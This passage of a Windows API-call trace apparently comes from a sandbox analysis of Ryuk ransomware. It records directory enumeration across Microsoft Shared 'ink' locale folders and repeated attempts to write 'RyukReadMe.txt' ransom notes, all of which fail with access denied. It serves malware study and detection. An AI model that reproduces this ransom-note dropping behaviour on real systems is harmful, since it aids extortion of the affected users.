lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.683] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.683] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.683] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.683] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.683] SetLastError (dwErrCode=0x0) [0131.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.684] GetLastError () returned 0x5 [0131.684] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.684] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.684] SetLastError (dwErrCode=0x0) [0131.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.684] GetLastError () returned 0x5 [0131.684] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.684] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.684] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.684] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.684] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.684] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.685] SetLastError (dwErrCode=0x0) [0131.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.685] GetLastError () returned 0x5 [0131.685] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.685] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.685] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.685] SetLastError (dwErrCode=0x0) [0131.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.685] GetLastError () returned 0x5 [0131.685] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.685] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.685] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.685] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.686] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.686] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.686] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.686] SetLastError (dwErrCode=0x0) [0131.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.686] GetLastError () returned 0x5 [0131.686] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.686] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.686] SetLastError (dwErrCode=0x0) [0131.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.686] GetLastError () returned 0x5 [0131.686] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.686] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.686] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.686] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.686] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.687] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.687] SetLastError (dwErrCode=0x0) [0131.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.687] GetLastError () returned 0x5 [0131.687] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.687] SetLastError (dwErrCode=0x0) [0131.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.687] GetLastError () returned 0x5 [0131.687] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.687] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.688] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.688] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.688] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.688] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.688] SetLastError (dwErrCode=0x0) [0131.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.688] GetLastError () returned 0x5 [0131.688] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.688] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.688] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.688] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.688] SetLastError (dwErrCode=0x0) [0131.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.689] GetLastError () returned 0x5 [0131.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.689] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.689] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.689] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.689] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.689] SetLastError (dwErrCode=0x0) [0131.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.689] GetLastError () returned 0x5 [0131.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.689] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.689] SetLastError (dwErrCode=0x0) [0131.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.689] GetLastError () returned 0x5 [0131.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.690] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.690] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.690] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.690] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.690] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.690] SetLastError (dwErrCode=0x0) [0131.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.690] GetLastError () returned 0x5 [0131.690] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.690] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.690] SetLastError (dwErrCode=0x0) [0131.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.690] GetLastError () returned 0x5 [0131.690] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.690] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.691] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.691] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.691] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.691] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.691] SetLastError (dwErrCode=0x0) [0131.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.691] GetLastError () returned 0x5 [0131.691] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.691] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.691] SetLastError (dwErrCode=0x0) [0131.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.691] GetLastError () returned 0x5 [0131.691] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.691] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.692] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.692] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.692] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.692] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.692] SetLastError (dwErrCode=0x0) [0131.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.693] GetLastError () returned 0x5 [0131.693] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.693] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.693] SetLastError (dwErrCode=0x0) [0131.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.693] GetLastError () returned 0x5 [0131.693] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.693] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.693] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.693] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.693] SetLastError (dwErrCode=0x0) [0131.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.694] GetLastError () returned 0x5 [0131.694] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.694] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.694] SetLastError (dwErrCode=0x0) [0131.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.694] GetLastError () returned 0x5 [0131.694] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.694] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.694] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.694] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.694] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.694] SetLastError (dwErrCode=0x0) [0131.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.695] GetLastError () returned 0x5 [0131.695] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.695] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.695] SetLastError (dwErrCode=0x0) [0131.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.695] GetLastError () returned 0x5 [0131.695] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.695] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.695] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.695] FindNextFileW (in: hFindFile=0x3bb4e0, 